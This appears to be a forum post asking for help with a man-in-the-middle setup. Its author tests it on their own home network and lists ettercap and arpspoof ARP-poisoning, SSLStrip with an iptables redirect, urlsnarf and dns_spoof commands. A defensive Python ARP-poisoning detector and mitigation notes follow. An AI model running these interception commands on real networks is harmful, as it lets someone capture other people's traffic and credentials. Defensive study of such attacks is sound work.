I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-bit Kali), by means of ARP-poisoning the communication between my router and my targeted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof.
I am using a combination of the following:
- SSLStrip
- Ettercap (with the dns_spoof plugin enabled).
- urlsnarf
- Wireshark (for examining post-test PCAP results)
The commands I perform are as follows:
Code:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/sslstrip.log
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i wlan0 | grep http > /root/session.txt
# 192.168.2.1 = router, 192.168.2.130 = Macbook Air
echo 1 > /proc/sys/net/ipv4/ip_forward; ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/
ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/
# This runs for a while, I then stop manually... and then clean up and examine results in Wireshark
wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/session.eci
I am able to intercept and decode HTTP packets just fine. Unfortunately, I've had little success in capturing and redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/. Instead, what happens is I will receive an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari) or a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; the domain just resolves as it should (see my /etc/ettercap/etter.dns configuration below).
I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534).
Code:
. . .
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
. . .
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
. . .
Alternatively, for a simple dnsspoof, I've tried a simple combination of arpspoof + dnsspoof. Doesn't work either.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1
dnsspoof -i wlan0 -f /root/hosts.txt
I've Googled for a few days now, but after reading post-upon-post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below...
Any help would be greatly appreciated.
Thanks,
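From the defender's side, the `arp:remote` poisoning described in this post leaves a distinctive trace: one MAC address starts answering for both the gateway's IP and the host's IP, and each of those IPs flips away from its original MAC. The detector below is an added example (not code from the post or from Ettercap); it runs over constructed ARP-reply records that reuse the router/host addresses 192.168.2.1 and 192.168.2.130 from the post, with made-up MAC addresses.

```python
"""Flag ARP-cache poisoning between a gateway and a host from observed ARP replies.

Added defender-side example, not from the original post. Input records are
(timestamp, sender_ip, sender_mac) tuples; the IPs are the router and host from
the post, the MAC addresses are constructed.
"""
from collections import defaultdict

# Constructed sample: two legitimate replies, then a third MAC claims both
# the router's and the host's IP (what bidirectional poisoning looks like).
SAMPLE_ARP_REPLIES = [
    (0.0,  "192.168.2.1",   "aa:aa:aa:aa:aa:01"),
    (0.5,  "192.168.2.130", "bb:bb:bb:bb:bb:02"),
    (10.0, "192.168.2.1",   "cc:cc:cc:cc:cc:03"),
    (10.1, "192.168.2.130", "cc:cc:cc:cc:cc:03"),
    (20.0, "192.168.2.1",   "cc:cc:cc:cc:cc:03"),
]

def analyze_arp(replies):
    """Return (ip_changes, multi_ip_macs).

    ip_changes: (ts, ip, old_mac, new_mac) for every IP whose MAC flipped.
    multi_ip_macs: mac -> sorted IPs, for MACs that claimed more than one IP.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    changes = []
    for ts, ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            changes.append((ts, ip, prev, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    multi = {m: sorted(ips) for m, ips in mac_to_ips.items() if len(ips) > 1}
    return changes, multi

def is_bidirectional_poisoning(replies, gateway_ip, host_ip):
    """True when a single MAC has claimed both the gateway's and the host's IP."""
    _, multi = analyze_arp(replies)
    return any(gateway_ip in ips and host_ip in ips for ips in multi.values())

if __name__ == "__main__":
    changes, multi = analyze_arp(SAMPLE_ARP_REPLIES)
    for ts, ip, old, new in changes:
        print(f"t={ts}: {ip} moved from {old} to {new}")
    print("MACs claiming several IPs:", multi)
    print("gateway<->host poisoning:",
          is_bidirectional_poisoning(SAMPLE_ARP_REPLIES, "192.168.2.1", "192.168.2.130"))
```

On a real network the same records can be fed from a switch's ARP log or a packet capture; a static ARP entry for the gateway on the client, or dynamic ARP inspection on the switch, stops the cache from being overwritten in the first place.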